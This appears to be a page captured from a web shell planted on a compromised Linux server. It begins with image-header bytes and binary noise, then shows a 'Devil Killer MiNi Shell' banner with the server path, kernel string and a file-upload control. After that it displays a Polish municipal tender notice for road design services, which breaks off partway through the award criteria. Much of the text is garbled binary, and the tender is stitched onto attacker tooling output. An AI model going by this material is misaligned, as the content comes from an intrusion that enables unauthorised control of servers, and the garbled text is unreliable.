JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20251021/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20251021/0048660001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Wykonanie dokumentacji projektowej wraz z uzyskaniem wszelkiej dokumentacji formalno-prawnej umożliwiającej zrealizowanie inwestycji polegającej na rozbudowie dróg gminnych </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013271269</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Kolejowa 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Ożarów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-850</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">22 731 32 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">um@ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ozarow-mazowiecki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie dokumentacji projektowej wraz z uzyskaniem wszelkiej dokumentacji formalno-prawnej umożliwiającej zrealizowanie inwestycji polegającej na rozbudowie dróg gminnych </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ef2b44e8-9193-4af5-8086-90a66ba92f74</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00486600</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-10-21</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00059761/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Projekt budowy ulicy Brzegowej od ulicy Ceramicznej do ulicy Duchnickiej w Ołtarzewie</p> <p class="mb-0">1.3.5 Projekt ul. Sochaczewskiej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ef2b44e8-9193-4af5-8086-90a66ba92f74 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między<br/>Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem<br/>https://ezamowienia.gov.pl.<br/>Szczegółowe zasady komunikacji elektronicznej zostały określone w Rozdziale 9 SWZ.<br/>2. W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem<br/>Platformy e-Zamówienia, Zamawiający dopuszcza komunikację za pomocą poczty elektronicznej na ściśle określony adres e-mail:<br/>zampub@ozarow-mazowiecki.pl (nie dotyczy składania ofert w postępowaniu). Skorzystanie z tego adresu w sytuacji gdy platforma<br/>działa poprawnie spowoduje zignorowanie przesłanej wiadomości</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia. Szczegółowo w Regulaminie Platformy e-Zamówienia, dostępnym na stronie internetowej ttps://ezamowienia.gov.pl<br/>oraz w „Centrum Pomocy”.<br/>2. Sposób sporządzenia dokumentów elektronicznych lub cyfrowego odwzorowania i poświadczania za zgodność musi być zgodny z<br/>wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/>3. Sposób sporządzenia dokumentów elektronicznych musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa<br/>Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych<br/>dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub<br/>konkursie (Dz. U. 2020 poz. 2452), dalej w treści jako: ,,rozporządzenie’’ oraz rozporządzeniu Ministra Rozwoju, Pracy i Technologii<br/>23 grudnia 20220 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń jakich może żądać<br/>Zamawiający od Wykonawcy (Dz. U. 2020 poz. 2415) 4. Dokumenty elektroniczne, o których mowa w § 2 ust. 1Rozporządzenia,<br/>których wykaz dla przedmiotowego postępowania jest podany w rozdziale 11, sporządza się w postaci elektronicznej, w formatach<br/>danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności, z uwzględnieniem<br/>rodzaju przekazywanych danych i przekazuje się jako załączniki do formularzy komunikacyjnych.<br/>5. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacji nie będą miały bezpośredniego zastosowania,<br/>(o ile dotyczy)<br/>6. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, przekazywane w postępowaniu<br/>sporządza się w postaci elektronicznej:<br/>- w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności (i<br/>przekazuje się jako załącznik), lub<br/>- jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>7. Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą elektroniczną za pośrednictwem dedykowanych<br/>formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do<br/>komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi.<br/>Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W<br/>przypadku załączników, które są, zgodnie z ustawą Pzp lub rozporządzeniem, opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem Wykonawcy/Wykonawcy wspólnie<br/>ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem zewnętrznym lub wewnętrznym<br/>(otaczającym). W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się do przesyłanej wiadomości<br/>uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ<br/>wewnętrzny).<br/>8. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy”<br/>na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji”<br/>służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta<br/>uproszczonego na Platformie e-Zamówienia.<br/>9. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy<br/>plików przesyłanych jako załączniki do jednego formularza</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Administratorem danych osobowych pozyskanych od Wykonawcy w ramach<br/>wykonywania Umowy jest Zamawiający.<br/>2. W ramach wykonania obowiązku informacyjnego, zgodnie z rozporządzeniem Parlamentu Europejskiego i rady (UE)2016/679 z<br/>dnia 27 kwietnia 2016 roku w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich informacji danych oraz uchylenia dyrektywy 95/46/WE (Dz. Urz. UE L 119 z 04.05.2016) - dalej<br/>RODO, Wykonawca poinformuje osoby, których jakiekolwiek dane osobowe zostały przekazane Zamawiającemu, o posiadaniu i<br/>przetwarzaniu danych osobowych tych osób przez Zamawiającego w celu wykonywania Umowy.<br/>3. Wykonawca zobowiązany jest także poinformować osoby, o których mowa powyżej, o prawie dostępu do treści danych, ich<br/>poprawiania, modyfikacji oraz możliwości skorzystania z innych uprawnień przewidzianych unormowaniami RODO.<br/>4. Dane identyfikujące Wykonawcę,przedmiot umowy i wysokość wynagrodzenia, stanowią informację publiczną w rozumieniu art. 1<br/>ust. 1 ustawy z dnia 6 września 2001 r. o dostępie do informacji publicznej (t.j. Dz. U. z 2019 r. poz. 1429),która podlega<br/>udostępnianiu w trybie przedmiotowej ustawy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.271.59.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 368836,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiot zamówienia obejmuje:<br/>a) wykonanie dokumentacji projektowej wraz z uzyskaniem wszelkiej dokumentacji formalno-prawnej umożliwiającej<br/>zrealizowanie inwestycji polegającej na:<br/>Cz. A - rozbudowie ulicy Brzegowej od ulicy Ceramicznej do ulicy Duchnickiej w Ołtarzewie<br/>b) uzyskanie pozwolenia na budowę lub decyzji na realizację inwestycji drogowej lub zgłoszenia robót budowlanych<br/>2. Przedmiot zamówienia obejmuje w szczególności:<br/>- wykonanie koncepcji projektowej,<br/>- wykonanie projektów budowlano – wykonawczych we wszystkich branżach niezbędnych do realizacji zadania (np.<br/>drogowej, kanalizacyjnej, energetycznej, telekomunikacyjnej i innych wymaganych) projekty zagospodarowania terenu,<br/>Specyfikacja Wykonania i Odbioru Robót, przedmiar robót, kosztorys inwestorski, projekt stałej i czasowej zmiany<br/>organizacji ruchu, materiały do wniosku o wydanie decyzji zezwalającej na realizację inwestycji drogowej lub/i pozwoleniu na budowę lub/i zgłoszenia robót budowlanych,<br/>- uzyskanie wymaganych prawem warunków technicznych, opinii, uzgodnień, zgód, pozwoleń, decyzji administracyjnych (w<br/>tym ZRID i dotyczących niezbędnej wycinki drzew i krzewów), zezwoleń w szczególności wynikających z ustawy prawo<br/>budowlane<br/>- podzielenie dokumentacji na odrębne opracowania w celu uzyskania decyzji administracyjnych, pozwalających na<br/>realizację robót budowlanych, u odpowiednich organów administracji państwowej i samorządowej, wg ich kompetencji, w<br/>szczególności na odrębne opracowania wynikające z przebiegu granic pasów drogowych oraz własności terenu,<br/>- wykonanie własnym staraniem i na własny koszt wszelkiego rodzaju pomiarów, map, badań geotechnicznych,<br/>inwentaryzacji oraz innych czynności i dokumentów a także uzyskania wszelkich dokumentów i decyzji w tym warunków<br/>technicznych, decyzji administracyjnych, opinii, uzgodnień, zgód a także ekspertyz, badań, które zgodnie z powszechnie<br/>obowiązującymi przepisami prawa okażą się niezbędne do wykonania dokumentacji i pozwolą Zamawiającemu na realizację<br/>zadań,<br/>- udzielenie pełnych wyjaśnień dotyczących dokumentacji projektowo-kosztorysowej na etapie wykonywania projektów,<br/>postępowania o udzielenie zamówienia publicznego na wykonanie robót budowlanych w terminie maksymalnie 2 dni od<br/>wezwania przez Zamawiającego pocztą elektroniczną,<br/>- opracowanie dokumentacji zaopatrzonej w wykaz opracowań oraz pisemne oświadczenie Wykonawcy, że została<br/>wykonana zgodnie z Umową, zgodnie z obowiązującymi przepisami techniczno-budowlanymi oraz, że jest kompletna z<br/>punktu widzenia celu, któremu ma służyć, a ponadto, że kosztorysy inwestorskie są aktualne według stanu na dzień<br/>podpisania przez strony protokołu zdawczo-odbiorczego potwierdzającego ich przekazanie Zamawiającemu,<br/>- usunięcie wad dokumentacji, w tym usunięcie jej braków, dokonanie jej uzupełnień bądź wprowadzenie w niej innych<br/>zmian – w przypadku zgłoszenia zastrzeżeń do tej dokumentacji przez Zamawiającego lub inne uprawnione Organy – bez<br/>dodatkowego wynagrodzenia.<br/>3. Zakres zadania inwestycyjnego może ulec zmianie, o ile wyniknie to z ustaleń i uzgodnień dokonywanych w trakcie<br/>wykonywania przedmiotu zamówienia, w szczególności ustaleń z Zamawiającym, na etapie uzgadniania rozwiązań<br/>projektowych/koncepcji, gdy zakres przedmiotu zamówienia będzie pozostawał w kolizji z obowiązującymi przepisami prawa<br/>lub normami budowlanymi, bądź też z innych przyczyn ich uwzględnienie nie będzie pozwalało na prawidłowe, wedle<br/>najlepszej wiedzy Zamawiającego lub Wykonawcy, wykonanie Umowy, Wykonawca zobowiązany jest zaproponować<br/>rozwiązanie zamienne.<br/>UWAGA: Przed rozpoczęciem prac projektowych, najpóźniej na 3 dni przed podpisaniem umowy należy przedstawić<br/>Zamawiającemu harmonogram rzeczowo-finansowy opracowywania dokumentacji.<br/>4. Zakres przedmiotu zamówienia składa się z opracowania:<br/>a) koncepcji projektowej obejmującej m.in.:<br/>- wskazanie nieruchomości objętych inwestycją<br/>- wskazanie kolizji z sieciami technicznymi i sposobu ich usunięcia<br/>- propozycję podziału procedur administracyjnych (w przypadku, gdy Wykonawca uzna zasadność rozdziału dokumentacji<br/>projektowych w celu niezależnego uzyskania pozwoleń, dokonania zgłoszeń robót budowlanych bądź wskazania zakresu<br/>prac niewymagających pozwolenia/zgłoszenia)<br/>- harmonogram opracowania projektu - opracowanie dokumentacji projektowej ze wskazaniem \ poszczególnych branż<br/>projektowych<br/>- ustalenie szacunkowego kosztu realizacji inwestycji w rozbiciu na poszczególne branże.<br/>b) wielobranżowej dokumentacji projektowej obejmującej min.:<br/>- projekty budowlane i wykonawcze we wszystkich branżach określonych w koncepcji,<br/>- projekty podziału,<br/>- Projekty rozbiórek wszelkich obiektów budowlanych koniecznych dla realizacji zadania, a wynikających z koncepcji,<br/>- kosztorysy inwestorskie, przedmiary oraz BIOZ i STWiORB,<br/>- wykonanie projektów z zapewnieniem dostępności obiektów dla osób niepełnosprawnych z dysfunkcjami ruchu, widzenia i<br/>słuchu oraz projektowania uniwersalnego.<br/>c) pełnienie nadzoru autorskiego w trakcie realizacji inwestycji, w przypadku wystąpienia braków lub błędów w dokumentacji<br/>projektowej, konieczności wykonania dodatkowych opracowań, a także w przypadku konieczności sporządzenia<br/>dokumentacji zamiennej, ich wykonania w ramach kwoty umownej wynagrodzenia nadzoru autorskiego.<br/>5. Zamawiający, zgodnie z art. 100 ust. 1 ustawy Pzp, wymaga aby niniejsze zamówienie - wykonanie dokumentacji<br/>projektowej, stanowiące opis przyszłego przedmiotu zamówienia na realizację robót dotyczących dróg, jako zamówienie<br/>przeznaczone do użytku osób fizycznych, spełniało wymagania w zakresie dostępności dla wszystkich użytkowników, w tym<br/>dla osób niepełnosprawnych. Wymagane jest opracowanie dokumentacji projektowej, zawierającej postanowienia do<br/>zrealizowania przyszłego zamówienia w taki sposób, aby osoby fizyczne wymienione powyżej mogły korzystać z niego bez<br/>żadnych utrudnień i ograniczeń. Szczegółowe zapisy dotyczące przeznaczenia projektowanego przyszłego przedmiotu<br/>zamówienia dla wszystkich<br/>użytkowników, w tym dla osób niepełnosprawnych Wykonawca zobowiązany jest określić w opracowanej dokumentacji<br/>projektowej, zgodnie z wymogami prawa, w tym ustawy Pzp.<br/>6. Realizując zamówienie Wykonawca zobowiązany jest do zapewnienia – w zakresie odpowiadającym przedmiotowi<br/>zamówienia i jego właściwościom - dostępności (architektonicznej, cyfrowej oraz informacyjno-komunikacyjnej) osobom ze<br/>szczególnymi potrzebami, co najmniej w zakresie określonym przez minimalne wymagania, o których mowa w art. 6 ustawy<br/>z dnia 19 lipca 2019 roku o zapewnieniu dostępności osobom ze szczególnymi potrzebami.<br/>7. Szczegółowy opis zakresu przedmiotu zamówienia zawarty został w niniejszej SWZ oraz w załączniku Nr 1 do SWZ, na<br/>który składają się opis przedmiotu zamówienia oraz mapy określające zakres drogi gminnej do zaprojektowania. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 201250 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Zamawiający<br/>przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, tzn. polegających na powtórzeniu podobnych<br/>usług, stanowiących niniejsze zamówienie podstawowe<br/>- Wartość usług, o których mowa powyżej może wynieść maksymalnie do 30 % wartości zamówienia podstawowego<br/>- Warunki na jakich zostaną udzielone powyższe usługi – będą zgodne z przedmiotem zamówienia podstawowego<br/><br/>Zamówienie podobne rozliczane będzie na warunkach ustalonych w wyniku negocjacji z wykonawcą i będzie<br/>obejmowało wymagania nie gorsze niż ustalone względem zamówienia podstawowego z uwzględnieniem faktu,<br/>że w sytuacji zwiększenia (np. robót budowlanych) wybranych pozycji kosztorysowych wymagane jest<br/>przedłożenie przez Wykonawcę wyliczeń popartych dowodami na to, że wzrost cen i kosztów ma wpływ<br/>na realizację robót</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny kryterium ceny z dokładnością do dwóch miejsc po przecinku zgodnie z<br/>zasadami matematycznymi, w kryterium doświadczenie osób wyznaczonych do realizacji zamówienia przyznane zostaną punkty<br/>całkowite (0,20,35), w „zielonym kryterium” tj. posiadanie certyfikatu wg normy ISO 14001 lub EMAS przyznane zostaną punkty<br/>całkowite (0, 5)<br/>2. Zamawiający wybierze ofertę najkorzystniejszą spośród nieodrzuconych ofert na podstawie kryterium ceny, doświadczenia osób<br/>wyznaczonych do realizacji zamówienia, „zielonego kryterium” tj. posiadanie certyfikatu wg normy ISO 14001 lub EMAS<br/>3. Za najkorzystniejszą zostanie uznana oferta z największą ilością punktów, stanowiących sumę punktów przyznanych w każdym<br/>kryterium z uwzględnieniem wagi procentowej danego kryterium.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> 